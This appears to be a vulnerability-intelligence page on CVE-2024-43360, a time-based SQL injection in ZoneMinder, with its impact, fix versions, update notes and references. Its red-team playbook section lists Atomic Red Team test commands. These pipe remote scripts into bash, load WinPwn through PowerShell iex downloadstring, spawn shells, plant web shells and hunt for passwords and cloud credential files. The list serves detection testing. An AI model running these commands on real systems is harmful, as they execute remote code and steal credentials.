CVE-2024-43360
Overview
The vulnerability is a time-based SQL Injection affecting ZoneMinder's database query handling. The root cause lies in insufficient input sanitization of user-supplied parameters, allowing crafted inputs to alter SQL queries executed by the application. This flaw impacts the core ZoneMinder software responsible for managing and querying video surveillance data.
Vulnerability Description
ZoneMinder is a free, open source closed-circuit television software application. ZoneMinder is affected by a time-based SQL Injection vulnerability. This vulnerability is fixed in 1.36.34 and 1.37.61.
Impact
An unauthenticated remote attacker can exploit this vulnerability to perform time-based SQL Injection attacks, enabling extraction or manipulation of sensitive database information. The exploit requires only network access and no user interaction or privileges (AV:N/AC:L/PR:N/UI:N). This can lead to unauthorized data disclosure, integrity compromise, and potential disruption of ZoneMinder's surveillance operations, severely impacting confidentiality, integrity, and availability of the system.
Solution
To remediate this vulnerability, upgrade ZoneMinder to version 1.36.34 or 1.37.61 as specified in the official GitHub security advisory (GHSA-9cmr-7437-v9fj). These versions include patches that properly sanitize input parameters to prevent SQL Injection. Refer to the advisory and associated commits on the ZoneMinder GitHub repository for detailed patch application instructions and verification steps.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the ZoneMinder application is characterized as a time-based SQL injection flaw, which allows an attacker to manipulate SQL queries by injecting malicious input into the application's database interactions. This type of vulnerability arises when user input is not properly sanitized, enabling an attacker to execute arbitrary SQL commands. In this case, the flaw can be exploited to extract sensitive information from the database, such as user credentials, surveillance footage metadata, or even the content of the video streams themselves. The severity of this vulnerability is underscored by its high CVSS score, indicating a critical risk to systems utilizing the affected versions of ZoneMinder.
Attack vectors for this vulnerability primarily involve the application's web interface, where users interact with the system. An attacker could craft a malicious request to the application, embedding SQL commands that exploit the flaw. By leveraging time-based techniques, the attacker can infer data from the database based on the application's response time to specific queries. For example, by sending a series of carefully timed requests, the attacker can deduce whether certain conditions are true or false, effectively allowing them to extract data bit by bit. This method can be particularly insidious, as it may not trigger traditional security alerts, making it difficult for defenders to detect the ongoing attack.
The real-world impact of this vulnerability can be significant, especially for organizations relying on ZoneMinder for security surveillance. Successful exploitation could lead to unauthorized access to sensitive surveillance data, potentially compromising the privacy of individuals captured in the footage. Additionally, the extraction of user credentials could facilitate further attacks within the organization's network, leading to data breaches or unauthorized system access. The business risks associated with such incidents include reputational damage, regulatory penalties, and the financial costs of incident response and recovery efforts. Organizations may also face legal repercussions if sensitive data is exposed or misused.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regularly updating the ZoneMinder application to the latest versions is crucial, as updates often include patches for known vulnerabilities. Additionally, employing web application firewalls (WAFs) can help filter out malicious requests before they reach the application. Implementing input validation and sanitization measures within the application code can also significantly reduce the risk of SQL injection attacks. Furthermore, organizations should conduct regular security assessments, including penetration testing, to identify and remediate potential vulnerabilities before they can be exploited by malicious actors.
In conclusion, the time-based SQL injection vulnerability in ZoneMinder presents a critical threat to organizations utilizing this surveillance software. The potential for data extraction and unauthorized access poses significant risks to both security and privacy. By understanding the technical details of the vulnerability, recognizing the various attack vectors, and implementing robust detection and mitigation strategies, organizations can better protect themselves against this and similar threats. Proactive measures, including timely updates and security assessments, are essential in maintaining the integrity and security of surveillance systems.
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2024-43360, with our telemetry indicating a recent emergence of exploitation attempts targeting vulnerable ZoneMinder deployments. This uptick, while still limited in scope, signals growing adversary interest and experimentation with this critical SQL injection flaw. The slight increase in the EPSS score corroborates this trend, suggesting that exploitation likelihood is rising steadily. Although no new exploit techniques or ransomware group involvements have been identified, the increased detection frequency underscores an evolving threat landscape where opportunistic attackers may seek to leverage this vulnerability for unauthorized data access or system compromise. For defenders, this development elevates the urgency of monitoring and response efforts, as the vulnerability is now demonstrably being probed in the wild, increasing the risk of successful exploitation. Consequently, the threat level should be considered heightened from a latent risk to an active exploitation phase, warranting closer attention to detection signals and incident readiness.
Update 2 — June 23, 2026
CSURFACE threat intelligence has detected a modest uptick in probing activity targeting the CVE-2024-43360 vulnerability, reflecting a slight increase in adversary interest despite a marked decline in the EPSS score. This divergence suggests that while automated exploitation attempts may be waning, manual or targeted reconnaissance efforts are persisting or intensifying. The continued presence of these probes indicates that threat actors remain engaged in assessing vulnerable ZoneMinder deployments, potentially as part of broader reconnaissance or preparatory stages for more sophisticated attacks. For defenders, this nuanced shift highlights the importance of maintaining vigilant monitoring for anomalous SQL injection attempts, as the vulnerability remains a critical vector for unauthorized access. The risk posture should be adjusted to reflect a sustained active exploitation environment with evolving attacker tactics rather than a diminishing threat, underscoring the need for ongoing situational awareness and adaptive defense measures.
Update 3 — July 16, 2026
CSURFACE threat intelligence has identified a slight increase in activity related to CVE-2024-43360, reflected by a modest uptick in detection events and a marginal rise in the EPSS score. While no new exploit techniques or proof-of-concept code have surfaced, this subtle escalation signals persistent adversary interest in leveraging the time-based SQL injection vulnerability within ZoneMinder. The incremental rise in exploitation attempts suggests that threat actors continue to probe vulnerable deployments, potentially as part of ongoing reconnaissance or low-effort intrusion campaigns. For defenders, this evolving pattern underscores the necessity of sustained vigilance and continuous monitoring, as the vulnerability remains a critical attack vector with a high potential for unauthorized data access or system compromise. Consequently, the threat level should be regarded as stable but active, with a slight increase in exploitation likelihood that warrants ongoing situational awareness.
Update 4 — August 18, 2026
CSURFACE threat intelligence has detected a slight increase in activity related to CVE-2024-43360, indicating that threat actors are maintaining persistent interest in exploiting this time-based SQL injection vulnerability within ZoneMinder deployments. While the overall exploit trend remains stable without evidence of new exploit techniques or proof-of-concept releases, the uptick in detection frequency suggests ongoing reconnaissance or opportunistic probing efforts. This subtle rise in adversary engagement underscores that the vulnerability continues to be a viable target for unauthorized access attempts, reinforcing the critical nature of the flaw. Consequently, the threat level should be considered cautiously elevated, reflecting sustained adversary focus and the potential for exploitation in environments where patches have not been applied.
Affected Products (2)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Zoneminder | Zoneminder | All |
cpe:2.3:a:zoneminder:zoneminder:*:*:*:*:*:*:*:*
|
|
|
Zoneminder | Zoneminder | All |
cpe:2.3:a:zoneminder:zoneminder:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
14 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (6)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-43360 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-9cmr-7437-v9fj |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/ZoneMinder/zoneminder/commit/677f6a31551f128554f7b0110a52fd76453a657a |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/ZoneMinder/zoneminder/commit/a194fe81d34c5eea2ab1dc18dc8df615fca634a6 |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/ZoneMinder/zoneminder/commit/bb07118118e23b5670c2c18be8be2cc6b8529397 |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/ZoneMinder/zoneminder/commit/de8f387207e9c506e8e8007eda725741a25601c5 |